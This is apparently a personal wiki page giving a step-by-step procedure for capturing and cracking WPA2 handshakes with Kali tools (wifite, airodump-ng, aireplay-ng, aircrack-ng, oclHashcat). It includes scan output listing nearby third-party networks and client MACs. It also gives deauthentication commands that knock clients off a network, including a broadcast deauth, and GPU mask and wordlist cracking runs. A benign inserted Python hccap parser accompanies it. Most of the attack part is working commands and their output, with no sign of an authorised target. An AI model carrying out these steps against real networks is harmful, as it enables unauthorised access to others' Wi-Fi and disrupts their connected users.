{{tag>[security crack wpa wpa2 handshake kali]}}
=====Capture WPA2 handshake=====
====Hardware====
* Intel NUC
* Intel Centrino 6235
====Install Kali====
* Install Kali from USB.
* Create user account.
* Update.
<code>
apt-get update
apt-get upgrade
</code>
* Install and enable SSHd.
<code>
apt-get install ssh
/etc/init.d/ssh start
update-rc.d ssh enable
</code>
====Capture with wifite====
* Start scanning.
<code>
# wifite wpa2
[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
NUM ESSID CH ENCR POWER WPS? CLIENT
--- -------------------- -- ---- ----- ---- ------
1 ------- 1 WPA2 34db no client
2 ------- 13 WPA2 34db no clients
3 UPC245788570 11 WPA2 30db wps
4 UPC486785_EXT 11 WPA2 26db wps
5 UPC WifiSpots 11 WPA2 25db no
6 UPC486785 11 WPA2 22db no clients
7 ------- 11 WPA2 21db no
8 UPC1461170 1 WPA2 19db no clients
9 VGV7519558FA2 6 WPA2 18db wps
10 UPC WifiSpots 1 WPA2 18db no
11 ------- 11 WPA2 18db no client
12 UPC501677338 36 WPA2 17db no
13 UPC245248760 6 WPA2 16db wps client
14 ------- 100 WPA2 15db no
15 H368N67798A 6 WPA2 13db wps
16 Ka1717169 9 WPA2 13db no client
17 UPC249259973 11 WPA2 13db wps client
18 UPC244634263 11 WPA2 13db wps
19 UPC240228706 1 WPA2 13db wps client
20 UPC WifiSpots 9 WPA2 12db no
21 UPC1263286 6 WPA2 11db no
22 UPC2176918 6 WPA2 11db no
23 UPC WifiSpots 6 WPA2 11db no
24 ------- 6 WPA2 10db wps
25 ------- 1 WPA2 10db wps
26 Sitecom8CF98C 8 WPA2 10db wps
27 ------- 1 WPA2 9db no
28 ------- 6 WPA2 9db no
29 UPC247811359 1 WPA2 9db wps clients
30 UPC241613374 11 WPA2 9db wps
31 UPC0988912 13 WPA2 7db no client
[0:01:54] scanning wireless networks. 31 targets and 15 clients found
[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
</code>
* Press ctrl-c when ready
* Enter the target number.
<code>
[+] select target numbers (1-19) separated by commas, or 'all': 2
[+] 1 target selected.
[0:08:20] starting wpa handshake capture on "--------"
[0:08:09] new client found: 04:F7:E4:51:E7:A8
[0:08:08] listening for handshake...
[0:00:12] handshake captured! saved as "hs/--------.cap"
[+] 1 attack completed:
[+] 1/1 WPA attacks succeeded
Schenkel (D4:CA:6D:53:23:41) handshake captured
saved as hs/--------.cap
[+] starting WPA cracker on 1 handshake
[!] no WPA dictionary found! use -dict command-line argument
[+] quitting
</code>
* Clean the capture file (wpaclean takes the output file first, then the input capture).
<code>
# wpaclean cleanwpa.cap --------.cap
Pwning --------.cap (1/1 100%)
Net d4:ca:6d:53:23:41 --------
Done
</code>
* Convert the .cap file to .hccap format for oclHashcat.
<code>
# aircrack-ng cleanwpa.cap -J out
Opening cleanwpa.cap
Read 3 packets.
# BSSID ESSID Encryption
1 D4:CA:6D:53:23:41 -------- WPA (1 handshake)
Choosing first network as target.
Opening cleanwpa.cap
Reading packets, please wait...
Building Hashcat (1.00) file...
[*] ESSID (length: 8): --------
[*] Key version: 2
[*] BSSID: D4:CA:6D:53:23:41
[*] STA: 04:F7:E4:51:E7:A8
[*] anonce:
3B 00 01 41 3D 46 19 79 80 E6 90 E6 AB 3C DB 07
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
[*] snonce:
C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 AC
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
[*] Key MIC:
AD 60 F8 4B 42 B1 CF E7 9F 82 97 0D 11 B7 CC F1
[*] eapol:
01 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
04 01 00 00 0F AC 02 0C 00
Successfully written to out.hccap
Quitting aircrack-ng...
</code>
* Try cracking with oclHashcat (mask attack, 12 characters of ?l?u?d).
<code>
oclHashcat64.exe -m 2500 out-wpa2.hccap -a 3 -1 ?l?u?d ?1?1?1?1?1?1?1?1?1?1?1?1
Session.Name...: oclHashcat
Status.........: Aborted
Input.Mode.....: Mask (?1?1?1?1?1?1?1?1?1?1?1?1) [12]
Hash.Target....: -------- (04:f7:e4:51:e7:a8 <-> d4:ca:6d:53:23:41)
Hash.Type......: WPA/WPA2
Time.Started...: Thu Jun 12 22:01:32 2014 (2 mins, 5 secs)
Time.Estimated.: > 10 Years
Speed.GPU.#1...: 126.6 kH/s
Speed.GPU.#2...: 129.0 kH/s
Speed.GPU.#3...: 129.2 kH/s
Speed.GPU.#4...: 124.4 kH/s
Speed.GPU.#5...: 129.1 kH/s
Speed.GPU.#6...: 129.0 kH/s
Speed.GPU.#*...: 767.2 kH/s
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.......: 94814208/16533293572437839872 (0.00%)
Skipped........: 0/94814208 (0.00%)
Rejected.......: 0/94814208 (0.00%)
HWMon.GPU.#1...: 83% Util, 61c Temp, 61% Fan
HWMon.GPU.#2...: 86% Util, 62c Temp, 60% Fan
HWMon.GPU.#3...: 84% Util, 65c Temp, 48% Fan
HWMon.GPU.#4...: 85% Util, 63c Temp, 44% Fan
HWMon.GPU.#5...: 84% Util, 58c Temp, 40% Fan
HWMon.GPU.#6...: 87% Util, 63c Temp, 48% Fan
Started: Thu Jun 12 22:01:32 2014
Stopped: Thu Jun 12 22:03:40 2014
</code>
* Or try with a wordlist and rules.
<code>
oclHashcat64.exe -a 0 -r rules\best64.rule -m 2500 -o foundpass.txt out-wpa2.hccap totaal_cleanfile.txt
</code>
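Added example, not part of these notes: a small Python parser for the hccap record that ''aircrack-ng -J'' writes, printing the same fields aircrack lists above (ESSID, BSSID, STA, key version, nonces, MIC). The sample record is constructed here with placeholder MACs and nonces; only its EAPOL header bytes follow the dump above.

```python
import struct

# hccap record layout consumed by oclHashcat -m 2500 (392 bytes, little-endian ints):
# essid[36] mac1[6]=AP mac2[6]=STA nonce1[32]=snonce nonce2[32]=anonce
# eapol[256] eapol_size(int) keyver(int) keymic[16]
HCCAP_FMT = "<36s6s6s32s32s256sii16s"
HCCAP_SIZE = struct.calcsize(HCCAP_FMT)  # 392

def mac_str(raw):
    return ":".join("%02X" % b for b in raw)

def parse_hccap(blob):
    """Decode one hccap record into a dict; raise ValueError on a malformed record."""
    if len(blob) != HCCAP_SIZE:
        raise ValueError("hccap record must be %d bytes, got %d" % (HCCAP_SIZE, len(blob)))
    essid, ap, sta, snonce, anonce, eapol, eapol_size, keyver, mic = struct.unpack(HCCAP_FMT, blob)
    if not 0 < eapol_size <= 256:
        raise ValueError("eapol_size out of range: %d" % eapol_size)
    if keyver not in (1, 2, 3):  # 1 = WPA/TKIP (HMAC-MD5), 2 = WPA2/CCMP (HMAC-SHA1), 3 = AES-128-CMAC
        raise ValueError("unexpected key version: %d" % keyver)
    return {
        "essid": essid.rstrip(b"\0").decode("ascii", "replace"),
        "bssid": mac_str(ap), "sta": mac_str(sta), "keyver": keyver,
        "anonce": anonce.hex(), "snonce": snonce.hex(), "mic": mic.hex(),
        "eapol": eapol[:eapol_size],   # the EAPOL-Key frame (M2) with its MIC field zeroed
    }

def build_hccap(essid, bssid, sta, snonce, anonce, eapol, keyver, mic):
    """Inverse of parse_hccap; only used here to construct a sample record."""
    return struct.pack(HCCAP_FMT, essid.encode().ljust(36, b"\0"),
                       bytes.fromhex(bssid.replace(":", "")), bytes.fromhex(sta.replace(":", "")),
                       snonce, anonce, eapol.ljust(256, b"\0"), len(eapol), keyver, mic)

# Constructed sample: placeholder MACs and nonces; the eapol bytes mirror the M2 header in the dump above.
SAMPLE = build_hccap("testnet", "00:11:22:33:44:55", "66:77:88:99:AA:BB",
                     bytes(range(32)), bytes(range(32, 64)),
                     bytes.fromhex("0103007502010a00100000000000000000"), 2, bytes(16))

if __name__ == "__main__":
    rec = parse_hccap(SAMPLE)
    for k in ("essid", "bssid", "sta", "keyver", "anonce", "snonce", "mic"):
        print("[*] %s: %s" % (k, rec[k]))
```

Run it against a real file with ''parse_hccap(open("out.hccap", "rb").read())'' to check that the ESSID and MACs match what aircrack reported before feeding the file to hashcat.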
====Capture with airmon-ng airodump-ng====
* Enable monitor mode on the WiFi interface.
<code>
# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
2506 NetworkManager
2633 wpa_supplicant
Interface Chipset Driver
wlan0 Intel 6235 iwlwifi - [phy0]
(monitor mode enabled on mon0)
</code>
* Find the nearest wireless networks. If targeting a specific AP, fix the channel with ''-c <channel>''.
<code>
# airodump-ng mon0
CH 8 ][ Elapsed: 1 min ][ 2014-06-12 21:06
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
D4:CA:6D:53:23:41 -61 158 25 0 13 54e. WPA2 CCMP PSK --------
D4:CA:6D:52:5D:E9 -61 141 13 0 1 54e. WPA2 CCMP PSK --------
DC:71:44:DE:35:F8 -66 234 0 0 11 54e WPA2 CCMP PSK UPC245788570
04:A1:51:22:3A:34 -76 158 8 0 11 54e WPA2 CCMP PSK UPC486785_EXT
EA:40:F2:B1:A3:E7 -76 131 0 0 11 54e WPA2 CCMP MGT UPC WifiSpots
E8:40:F2:B1:A3:E5 -78 134 9 0 11 54e WPA2 CCMP PSK UPC486785
CE:BC:C8:FE:EA:C3 -80 85 0 0 11 54e. WPA2 CCMP PSK --------
C8:BC:C8:FE:EA:C3 -80 93 2 0 11 54e. WPA2 CCMP PSK --------
44:32:C8:FC:EB:9B -84 40 0 0 1 54e WPA2 CCMP PSK UPC1461170
88:03:55:55:8F:A2 -83 61 0 0 6 54e WPA2 CCMP PSK VGV7519558FA2
5C:A3:9D:80:A3:98 -83 44 0 0 6 54e WPA2 CCMP PSK UPC245248760
46:32:C8:FC:EB:9D -85 40 0 0 1 54e WPA2 CCMP MGT UPC WifiSpots
8C:E0:81:67:79:8A -86 20 0 0 6 54e WPA2 CCMP PSK H368N67798A
14:49:E0:A4:70:28 -86 13 3 0 11 54e WPA2 CCMP PSK UPC249259973
5C:A3:9D:98:21:F8 -86 17 0 0 11 54e WPA2 CCMP PSK UPC244634263
5C:A3:9D:FD:13:E8 -85 36 0 0 1 54e WPA2 CCMP PSK UPC240228706
00:0C:F6:91:6A:78 -88 22 1 0 11 54e. WPA2 CCMP PSK Sitecom916A78
C4:27:95:75:D8:95 -1 0 0 0 7 -1
DC:71:44:A8:08:88 -90 2 0 0 1 54e WPA2 CCMP PSK UPC242046314
CE:BC:C8:FE:EA:C4 -86 1 0 0 100 54e WPA2 CCMP PSK --------
DC:71:44:DE:35:F0 -84 1 0 0 36 54e WPA2 CCMP PSK UPC501677338
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 14:99:E2:43:58:65 -82 0 - 1 0 11 UPC1461170
(not associated) F0:25:B7:EB:D2:83 -90 0 - 1 0 1 H368N67798A
D4:CA:6D:53:23:41 74:E1:B6:95:01:69 -71 0e- 0 0 9
D4:CA:6D:53:23:41 04:F7:E4:51:E7:A8 -84 0 -24 10 8 --------
E8:40:F2:B1:A3:E5 04:A1:51:22:3A:34 -1 0e- 0 0 1
C8:BC:C8:FE:EA:C3 F0:27:65:D7:0D:09 -86 0 - 1 0 1
44:32:C8:FC:EB:9B A4:D1:D2:6A:1B:1D -1 1e- 0 0 1
14:49:E0:A4:70:28 C0:CB:38:01:1D:31 -1 1e- 0 0 1
C4:27:95:75:D8:95 00:22:FA:96:D5:0C -82 0 - 6e 0 4
</code>
* Dump packets from the target channel and BSSID to a file.
<code>
# airodump-ng --channel 11 --bssid 00:11:22:33:44:55 --write channel11 mon0
</code>
* Wait for a handshake... or
* Deauthenticate a client from the network (''-a'' is the AP BSSID, ''-c'' the client MAC; the values were stripped from these notes, so placeholders are shown).
<code>
# aireplay-ng --deauth 0 -a <AP-BSSID> -c <CLIENT-MAC> mon0
</code>
* Or, if you don't know the MAC of any associated client, broadcast a deauth.
<code>
# aireplay-ng --deauth 0 -a <AP-BSSID> mon0
</code>
* Extract the handshake frames (EAPOL plus beacons, type/subtype 0x08, which carry the ESSID). The filter must be quoted or the shell treats ''||'' as an operator.
<code>
tshark -r <IN.cap> -R "eapol || wlan.fc.type_subtype == 0x08" -w <OUT.cap>
</code>